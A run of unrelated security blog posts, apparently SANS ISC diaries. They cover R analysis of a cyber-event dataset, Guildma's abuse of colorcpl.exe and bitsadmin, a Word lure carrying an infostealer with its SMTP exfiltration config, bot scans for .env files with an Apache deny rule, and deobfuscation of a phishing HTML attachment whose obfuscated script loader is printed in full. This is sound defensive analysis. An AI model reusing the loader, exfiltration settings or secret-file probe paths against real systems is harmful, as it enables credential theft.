Of 10642 observations, there are 109 months of data, with 973 unique actors, six actor types, nine motives, four event types and plethora others. Hovering over the interactive figures we discover that motives include espionage, financial, industrial-espionage, personal attack, political-espionage, protest, protest-financial, sabotage, and undetermined. We also learn that event types include disruptive, exploitative, mixed, and undetermined. More on this next where we use janitor to manipulate this data further. dataxray is a great opening salvo in your analysis attack, fulfilling descriptive statistics capabilities admirably.

janitor, CGPfunctions, and vtree

While looking for improved methods to count by group in R I discovered janitor via Sharon’s Infoworld article including “quick and easy ways to count by groups in R, including reports as data frames, graphics, and ggplot graphs” (Machlis, 2020).
janitor includes simple little tools for “examining and cleaning dirty data, including functions that format ugly data.frame column names, isolate duplicate records for further study, and provide quick one- and two-variable tabulations (i.e., frequency tables and crosstabs) that improve on the base R function table().”
The CISSM CAD data sets up perfectly for a variety of table views with counts and/or percentages. While base R’s table() and dplyr’s count() are perfectly useful, a little enrichment never hurt anyone.
As you can see, table and count perform perfectly well.

>table(df$event_type)

  Disruptive Exploitative        Mixed Undetermined 
        3462         5561         1525           94 

>df %>% 
+   count(event_type)
    event_type    n
    
1   Disruptive 3462
2 Exploitative 5561
3        Mixed 1525
4 Undetermined   94

What table and count don’t necessarily provide are the aforementioned enrichment, but tabyl and janitor’s adorn functions fill that void nicely.
First, basic tabyl use yields quick results as seen in the partial output snippet below.

>tabyl(df, event_type, motive)

   event_type Espionage Financial Industrial-Espionage Personal Attack Political-Espionage Protest Protest,Financial Sabotage Undetermined
   Disruptive         0      1335                    0              27                   6     643                 0      240         1211
 Exploitative        25      3077                   86              64                 497     282                 0       42         1488
        Mixed         0      1361                    2               2                  14      41                 1       16           88
 Undetermined         0        57                    0               0                   2       2                 0        1           32

If we chose to adorn our results however the result is all the more beneficial.

>tabyl(df, event_type, motive) %>%
+   adorn_percentages("col") %>%
+   adorn_pct_formatting(digits = 1)

   event_type Espionage Financial Industrial-Espionage Personal Attack Political-Espionage Protest Protest,Financial Sabotage Undetermined
   Disruptive      0.0%     22.9%                 0.0%           29.0%                1.2%   66.4%              0.0%    80.3%        43.0%
 Exploitative    100.0%     52.8%                97.7%           68.8%               95.8%   29.1%              0.0%    14.0%        52.8%
        Mixed      0.0%     23.3%                 2.3%            2.2%                2.7%    4.2%            100.0%     5.4%         3.1%
 Undetermined      0.0%      1.0%                 0.0%            0.0%                0.4%    0.2%              0.0%     0.3%         1.1%

Continuing our journey with event types and motives, a similar construct can be visualized using CGPfunctions.
Per the CGPfunctions description, it’s a package that includes miscellaneous functions useful for teaching statistics as well as actually practicing the art. They typically are not new methods but rather wrappers around either base R or other packages. In this case, we’ll use PlotXTabs2 which wraps around ggplot2 to provide bivariate bar charts for categorical and ordinal data, specifically the event_type and motive variables.

PlotXTabs2(df, event_type, motive, title = "Event Type by Motive")

Figure 2: CISSM CAD PlotXTabs2

PlotXTabs2 stands out as it offers a summary of key frequentist and bayesian information as a subtitle (can be suppressed) as well as a plethora of formatting options courtesy of ggstatsplot (Powell, 2020). Noteworthy in the resulting plot is the fact that across all event types (disruptive, exploitative, mixed, undetermined) the predominant motive was financial. Not surprising, but noteworthy. Regardless, PlotXTabs2 provides an incredibly useful visualization of the CAD dataset with specific variables.

Finally, we conclude this section with use of the vtree package. vtree, or variable trees, displays information about nested subsets of a data frame, in which the subsetting is defined by the values of categorical variables. This is again a perfect option for our subsetted CISSM CAD data. First, we generate a simple vtree based only on event type.

vtree(df, "event_type")

Figure 3: CISSM CAD event type vtree

The result includes a breakdown of event types from the total of 10642 events, including counts and percentage. If you prefer a view without counts you can exclude them as follows; in this case we do so with motives. Note that vtree is incredibly rich with argument features, tailor your visualizations to your liking. Call help("vtree") to learn more.

vtree(df, "motive", showcount = FALSE)

Figure 4: CISSM CAD motive vtree

Finally, we join event types and motives, and pivot our tree to be read vertically.

vtree(df, c("event_type", "motive"), showcount = FALSE, horiz = FALSE)

Figure 5: CISSM CAD vertical event types and motives vtree

The more data you join, the more unwieldy the tree becomes, but nonetheless an intriguing view when zoomed appropriately.

We'll continue this exploratory data analytics journey with forecasting models and plots to show how you might predict future attack volumes. Feel free to drop questions in comments or ping me via socials.

Cheers…until next time.

Russ McRee | @holisticinfosec | infosec.exchange/@holisticinfosec | LinkedIn.com/in/russmcree

References

Acharya, S. (2021, June 15). What are RMSE and Mae? Medium. Retrieved May 3, 2023, from https://towardsdatascience.com/what-are-rmse-and-mae-e405ce230383

Harry, C., & Gallagher, N. (2018). Classifying cyber events. Journal of Information Warfare, 17(3), 17-31.

Machlis, S. (2020, September 10). How to count by group in R. InfoWorld. Retrieved May 1, 2023, from https://www.infoworld.com/article/3573577/how-to-count-by-groups-in-r.html

Nau, R. (2020, August 8). Introduction to ARIMA models. Statistical forecasting: notes on regression and time series analysis. Retrieved May 4, 2023, from https://people.duke.edu/~rnau/411arim.htm#pdq

Powell, C. (2020, November 12). Using PlotXTabs2. The Comprehensive R Archive Network. Retrieved May 2, 2023, from https://cran.r-project.org/web/packages/CGPfunctions/vignettes/Using-PlotXTabs2.html

 

While analyzing a Guildma (AKA Astaroth) sample recently uploaded to MalwareBazaar [1], we came across a chain of LOLBIN abuse. It is not uncommon to see malicious code using the LOLBIN ‘bitsadmin.exe’ to download artifacts from the Internet. However, what is interesting in this case is that Guildma first copies ‘bitsadmin.exe’ to a less suspect path using ‘colorcpl.exe’, another LOLBIN, before executing it. 

The ‘colorcpl.exe’ binary is the command line tool to open the Windows Color Management panel. When used without parameters, it just opens the tool. If a file is given as a parameter, ‘colorcpl.exe’ will copy the file to the ‘c:\windows\system32\spool\drivers\color\’ path. This path is writable by any user — so there is nothing here related to abusing the binary to access a privileged location. It seems to be a way to not draw the attention of security controls by avoiding using the ‘copy’ command. 

As a result, the Guildma’s installation script executes ‘bitsadmin.exe’ not from the original path (%windir%\system32\bitsadmin.exe) but from ‘%windir%\system32\spool\drivers\color\bitsadmin.exe’. The figure below presents the download function of the JavaScript used in the early stages of the infection. 

 

By doing so, Guilma may bypass security controls that expect to detect the abuse of bitsadmin.exe executed on its original folder. 

References to ‘colorcpl.exe’ misusing can be found at xClopedia [2] and Mandiant Red Team Countermeasures [3]. There is also a project with KQL query to detect ‘colorcpl.exe’ abuse at [4].

* Analysis in collaboration with Mateus Santos. 

References

[1] MalwareBazaar | SHA256 c7aa1f959055026205d48568ec9743aca2a7f9489aa9470a76bd6ef95a7abad2 (Guildma) (abuse.ch)

[2] colorcpl.exe | Microsoft Color Control Panel | STRONTIC

[3] red_team_tool_countermeasures/SUSPICIOUS EXECUTION OF COLORCPL.EXE (METHODOLOGY).ioc at master · mandiant/red_team_tool_countermeasures (github.com)

[4] FalconFriday/FireEye_red_team_tool_countermeasures.md at master · FalconForceTeam/FalconFriday (github.com)

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

When attackers design malicious documents, one of their challenges is to make the potential victim confident to perform dangerous actions: click on a link, disable a security feature, etc. The best example is probably VBA macros in Microsoft Office documents. Disabled by default, the attacker must make the user confident to enable them by clicking on the “yellow ribbon” on top of the document.

Yesterday I found a malicious document that implements another approach. The SHA256 is c2d55f54c26d6f73908c7138e999fadcb9a8617fea8f56cee943f93956adfa12 and the VT score is 27/59. The document has an embedded object:

remnux@remnux:/MalwareZoo/20230503$ oledump.py c2d55f54c26d6f73908c7138e999fadcb9a8617fea8f56cee943f93956adfa12.doc
  1:       113 '\x01CompObj'
  2:       280 '\x05DocumentSummaryInformation'
  3:       408 '\x05SummaryInformation'
  4:      2607 '1Table'
  5:      4096 'Data'
  6:        76 'ObjectPool/_1567188875/\x01CompObj'
  7: O  674329 'ObjectPool/_1567188875/\x01Ole10Native'
  8:         6 'ObjectPool/_1567188875/\x03ObjInfo'
  9:      4142 'WordDocument'

This OLE object is definitively interesting:

remnux@remnux:/MalwareZoo/20230503$ oledump.py c2d55f54c26d6f73908c7138e999fadcb9a8617fea8f56cee943f93956adfa12.doc -s 7 |more
00000000: 15 4A 0A 00 02 00 6D 69  63 72 6F 73 6F 66 74 31  .J....microsoft1
00000010: 30 63 6F 6E 76 65 72 74  65 72 73 2E 65 78 65 00  0converters.exe.
00000020: 43 3A 5C 55 73 65 72 73  5C 44 2E 45 2E 4C 2E 4C  C:\Users\D.E.L.L
00000030: 5C 44 65 73 6B 74 6F 70  5C 6D 69 63 72 6F 73 6F  \Desktop\microso
00000040: 66 74 31 30 63 6F 6E 76  65 72 74 65 72 73 2E 65  ft10converters.e
00000050: 78 65 00 00 00 03 00 3E  00 00 00 43 3A 5C 55 73  xe.....>...C:\Us
00000060: 65 72 73 5C 44 2E 45 2E  4C 2E 4C 5C 41 70 70 44  ers\D.E.L.L\AppD
00000070: 61 74 61 5C 4C 6F 63 61  6C 5C 54 65 6D 70 5C 6D  ata\Local\Temp\m
00000080: 69 63 72 6F 73 6F 66 74  31 30 63 6F 6E 76 65 72  icrosoft10conver
00000090: 74 65 72 73 2E 65 78 65  00 60 48 0A 00 4D 5A 90  ters.exe.`H..MZ.
000000A0: 00 03 00 00 00 04 00 00  00 FF FF 00 00 B8 00 00  ................
000000B0: 00 00 00 00 00 40 00 00  00 00 00 00 00 00 00 00  .....@..........
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000D0: 00 00 00 00 00 00 00 00  00 80 00 00 00 0E 1F BA  ................
000000E0: 0E 00 B4 09 CD 21 B8 01  4C CD 21 54 68 69 73 20  .....!..L.!This
000000F0: 70 72 6F 67 72 61 6D 20  63 61 6E 6E 6F 74 20 62  program cannot b
00000100: 65 20 72 75 6E 20 69 6E  20 44 4F 53 20 6D 6F 64  e run in DOS mod
00000110: 65 2E 0D 0D 0A 24 00 00  00 00 00 00 00 50 45 00  e....$.......PE.

When you open the file in a sandbox, you see this:

This is not a bad idea... Users could be afraid to click on the classic yellow ribbon to activate a VBA macro. Here, users are asked to double click on the object to "convert the document to normal size". The embedded object properties:

Let's extract the PE file from the document:

remnux@remnux:/MalwareZoo/20230503$ oledump.py c2d55f54c26d6f73908c7138e999fadcb9a8617fea8f56cee943f93956adfa12.doc -s 7 -e >sample.exe 

The extract payload is a .Net executable[1]. It's an infostealer that exfiltrates data using the following config:

{
  "flow":20,
  "host":"mail.tcci.org.sa",
  "port":587,
  "password":"<Redacted>",
  "protocol":"smtp",
  "username":"fahad.s@tcci.org.sa"
}

[1] https://bazaar.abuse.ch/sample/4c312e3cce557ee17db0299bcc112699e616fb162afdadf12a41815a4a314b5c/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Today, automation is a crucial point for many organizations. In cloud environments, in containers, many apps are deployed automatically, for example, to face a sudden peak of activity or to reduce costs. Automation means that everything must be pre-configured: specifications of the applications but also critical information to interact with the hosting platform (credentials, API keys, secret keys, …)

Such information is often stored in environment files. The best example is probably the “.env’ file used by Docker. Such files contain credentials in key-value format for services. They should be stored locally and not be uploaded to code repositories. The verb “should” is the problem. Many developers include .env files in online repositories and, when the application is deployed, they become publicly available!

Of course, bots are looking for such files. I detected a recent peak of activity in my logs:

How to protect against this? First, education is key, and developers must be aware of the danger of publishing details about their environment in the wild. In parallel to awareness, access to dangerous files can be denied using simple rules, for example, with Apache:

<Files ~ "\.(env|json|config.js|md|gitignore|gitattributes|lock)$">
    Order allow,deny
    Deny from all
</Files>

Which .env files are searched by bots? Here are the top 10 URIs from my logs:

/.env	22004
/laravel/.env	2371
/web/.env	1610
/demo/.env	1532
/admin/.env	998
/app/.env	989
/api/.env	826
/core/.env	808
/backend/.env	665
/public/.env	495

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

I was asked where one can find VBA project references inside an ole file with VBA code.

Document [MS-OVBA] gives all the details: project references are found inside the dir stream (together with project and modules information), and a "compiled" version of that information (PerformanceCache) can be found inside the _VBA_PROJECT stream.

The content of the dir stream is compressed, and can be viewed like this:

The content of the _VBA_PROJECT stream is not compressed:

I developed a plugin to parse the records of the dir stream (as documented in [MS-OVBA]): plugin_vba_dir.

Since the PerformanceCache data is not documented (and optional), I don't know how to parse it. But you can extract strings from it and infer references.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

When it comes to analysis of malicious code, one often has to weigh the potential benefits of a quick, dynamic analysis, which might cause the code to interact with infrastructure operated by a threat actor and thus “break OPSEC”, against the benefits of a slower approach based mostly on static analysis techniques.

Whenever one deals with what might be a targeted malware/attack, the concerns of “OPSEC” usually win out. However, even when it comes to something as trivial as an HTML file that was delivered as an attachment of what looks like generic phishing, we might not wish to simply open it in a browser, even in a sandbox VM.

Last week, I came across one such generic phishing, which promised a “Q1 Financial report” for my company, and which contained an obfuscated HTML attachment.

And since the obfuscation was done in such a way, which enables us to analyze the file “passively”, without the need to interact with external infrastructure, and demonstrate one of the basic principles behind quick and efficient analysis of obfuscated code (i.e., let the code deobfuscate or decode itself, if possible) at the same time, I thought it might be interesting to go over it in this Diary.

The HTML file contained the following code:

<script>
let x = ['3c', '68', '74', '6d', '6c', '3e', 'a', '3c', '68', '65', '61', '64', 

...

'3c', '2f', '73', '63', '72', '69', '70', '74', '3e', '3c', '2f', '62', '6f', '64', '79', '3e', 'a', '3c', '2f', '68', '74', '6d', '6c', '3e'];
var y = "";
for(let user of x){
	y += (String.fromCharCode(parseInt(user,16)));
}
document.write(y);
</script>

We could, of course, use CyberChef or some other utility to decode the encoded string, however, if we simply add the line

document.write("<plaintext>");

before the line

document.write(y);

we can take advantage of the aforementioned “let the code deobfuscate itself” principle. The <plaintext> tag causes all following HTML code to be displayed as text, which is quite useful for our purposes.

If we opened the modified HTML page in a browser, it would display the following output:

<html>
<head>
<h5 class="uZxyMjPR lhAUZdJd" id="CLXzOZiW" title="vAJPxV" ></h5>
</head>
<body>
<h1 class="KfNETAGW ATKzJliB" id="NqucEakmCu" title="vFzyVAi" ></h1>

<input class="W4UzVa2g" type="hidden" id="umrKjg" value="aHR0cHM6Ly9wcHNjaW5zdXJhbmNlLmNvLnVrL2RlbmltYS81ZTU3OTZhLnBocA=="></input><h3 class="mqwJUI JXndOI" id="orafrRjoYj" title="hmHfSwSj" ></h3>
<img class="gNLbSj aHR0cHM6Ly9wcHNjaW5zdXJhbmNlLmNvLnVrL2RlbmltYS9hZG1pbi9qcy9tcC5waHA/YXI9ZDI5eVpBPT0mYjY0ZT1QQkVxbHBsTkYmYjY0dT11bXJLamcmY29uZj1Ld0RZcHZPJmNhbGw9Z05MYlNq"></img>
<span class="AvZQjGyg bZzYjo" id="MJXtdAP" title="OlYEqf" ></span>

<input class="0kgsbQD7E" type="hidden" id="KwDYpvO" value="eyJiYWNrIjoiZGVmYXVsdCIsInRpdGxlIjoiZGVmYXVsdCIsImNhcHRpb24iOiJkZWZhdWx0In0="></input>
<h4 class="vjmpeggbgy ChVlvnr" id="LXHQfT" title="KqbTJfKx" ></h4>

<ul class="heWrXR NgYtpToR" id="jldsatuhz" title="cgRqQc" style="display:none;">PGltZyBjbGFzcz0iZ05MYlNqIGFIUjBjSE02THk5d2NITmphVzV6ZFhKaGJtTmxMbU52TG5WckwyUmxibWx0WVM5aFpHMXBiaTlxY3k5dGNDNXdhSEEvWVhJ</ul>
<input type="hidden" class="PDTx" id="PBEqlplNF" value=[base64-encoded e-mail address of the recipient] ></input>
<cite class="rnfOnl MddANPwCht" id="ijYCNTMw" title="wmqVeaWO" style="display:none;">OVpESTVlVnBCUFQwbVlqWTBaVDFRUWtWeGJIQnNUa1ltWWpZMGRUMTFiWEpMYW1jbVkyOXVaajFMZDBSWmNIWlBKbU5oYkd3OVowNU1ZbE5xIj48L2ltZz4=</cite>
<strong class="sYlEMIaQtC kCAsIw" id="ZqDIXe" title="aQUaTBEPUE" ></strong>

<input type="hidden" id="EkmtcB GfewqfD" class="lv38zEvBu" value="d29yZA==">
<script>eval(`\x75\x71K\x76\x75u = wi\x6e\x64ow["\x64\x6f\x63\x75m\x65n\x74"].c\x72\x65\x61\x74\x65E\x6ce\x6dent\x28"scr\x69pt");uq\x4bv\x75\x75.\x73rc\x20=\x20\x74\x68\x69s\x2e\x63\x6f\x6est\x72u\x63\x74o\x72.c\x6fnst\x72\x75ct\x6fr(\x27r\x65tur\x6e\x20\x61\x74\x6f\x62(\x41rra\x79\x2econs\x74r\x75\x63\x74\x6fr\x2e\x63\x6fnst\x72ucto\x72("\x72\x65\x74\x75\x72\x6e\x20do\x63u\x6d\x65nt"\x29(\x29\x2eque\x72\x79\x53e\x6c\x65\x63\x74o\x72("\x2e\x67\x4e\x4cbS\x6a\x22).\x63\x6ca\x73s\x4c\x69\x73t\x5b1]\x29')\x28)\x3bvar \x45\x42PwM\x4diTe\x4f = \x77i\x6e\x64o\x77.\x63onstr\x75\x63t\x6fr["c\x6f\x6es\x74\x72u\x63\x74o\x72"].\x63\x6f\x6e\x73\x74ru\x63\x74\x6fr(\x27A\x72r\x61\x79.\x63onstruc\x74or.c\x6f\x6e\x73tr\x75\x63\x74or\x28\x22\x72\x65t\x75\x72\x6e\x20\x64o\x63um\x65\x6e\x74\x22\x29\x28\x29.h\x65\x61d\x2eappe\x6e\x64\x43hild\x28uq\x4b\x76u\x75)\x3b')\x3bEB\x50\x77M\x4d\x69\x54e\x4f(\x29\x3b`)</script></body>
</html>

Given the character set used in some of the strings we see in the code, along with the fact that few of these strings end in one or two equal signs, we might easily conclude that these strings are Base64-encoded. However, before we take a look at the strings, it would be advisable to determine what the remaining obfuscated JavaScript is supposed to do.

Once again, we can let the code deobfuscate itself – this time by replacing the “eval” function call by a “document.write” function call. If we do so and load the modified HTML code in a browser, the following code will be displayed.

uqKvuu = window["document"].createElement("script");
uqKvuu.src = this.constructor.constructor('return atob(Array.constructor.constructor("return document")().querySelector(".gNLbSj").classList[1])')();
var EBPwMMiTeO = window.constructor["constructor"].constructor('Array.constructor.constructor("return document")().head.appendChild(uqKvuu);
');
EBPwMMiTeO();

Even at a quick glance, we can see that our assumption about Base64 encoding was correct (the use of “atob” function) and we see that contents of the “gNLbSj” are certainly worth decoding. If we do so, we discover the following URL:

hxxps://ppscinsurance[.]co[.]uk/denima/admin/js/mp.php?ar=d29yZA==&b64e=PBEqlplNF&b64u=umrKjg&conf=KwDYpvO&call=gNLbSj

One additional thing we might wish to do would be to search for any other Base64-encoded URLs, which we can do easily by identifying any strings which start with the sequence “aHR0cHM6” (Base64-encoded string “https:”).

There appears to be only one in the value of the first input tag of the code, which decodes to the following URL:

hxxps://ppscinsurance[.]co[.]uk/denima/5e5796a.php

Although we can’t get much further just by “passive” analysis, these two IoA/IoC indicators might be enough – especially if all we wanted was to make sure that no one in our organization opened a similar attachment.

Of course, if we didn’t care about letting the threat actors know that we discovered their phishing attachment, we could try interacting with the two identified URLs directly. Especially the first one might be interesting, since, as we can see from the code above, additional content is loaded from it (in this instance, it is a fake M365 login page).

Alternatively, we could skip the “passive” analysis all together, open the HTML file in a browser and see what URLs would be accessed by it, though, this has the aforementioned drawbacks of being easily detectible by the threat actors.

A few more points deserve mention in relation to this phishing.

• The domain used to host the external components of the phishing page was registered only couple of weeks before the phishing message was sent out (specifically, on April 12th[1]) and appears to be a play on legitimate domain used by certain UK insurance broker firm.
• Upon closer examination of additional accessible URLs on the domain, it seems that an admin interface for the phishing kit, which the threat actors used in this attack, was left exposed. Furthermore, the login page for the admin panel showed an interesting “disclamer”, consisting of following strings, which would almost certainly not hold up under any legal scrutiny, but its inclusion paints an interesting picture of the phishing kit’s author:
  "Disclamer!"
  "This Page Is Only For Educational Purpose."
  "And for learning purposes too"
  "Im not responsible for any damage caused by this page"
  
  
• Based on a quick Google search, it appears that the “/admin/js/mp.php” part of one of the URLs is specific to this phishing kit and might, indeed, be useful as an IoA/IoC[2,3].

[1] https://whois.domaintools.com/ppscinsurance.co.uk
[2] https://www.joesandbox.com/analysis/854623/0/html
[3] https://www.joesandbox.com/analysis/853985/0/html

-----------
Jan Kopriva
@jk0pr
Nettles Consulting